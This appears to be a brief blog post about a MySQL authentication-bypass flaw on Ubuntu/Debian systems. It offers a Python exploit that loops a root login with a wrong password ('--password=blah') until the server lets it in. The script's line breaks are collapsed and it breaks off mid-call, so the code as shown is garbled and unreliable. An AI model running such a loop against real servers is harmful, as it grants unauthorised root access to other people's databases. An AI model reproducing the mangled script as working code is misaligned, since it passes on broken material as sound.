This vulnerability was public by @hdmoore, @jcran, @jduck1337 and another security expert guys from my twitter.
This vulnerability effects on Ubuntu/Debian 32/64bit, MySQL 5.5.22 not work on RHEL/CentOS5 and 6 (x86_64)
Python script for this vulnerability
#!/usr/bin/pythonimport subprocesswhile 1: subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait(
Details here:
No comments:
Post a Comment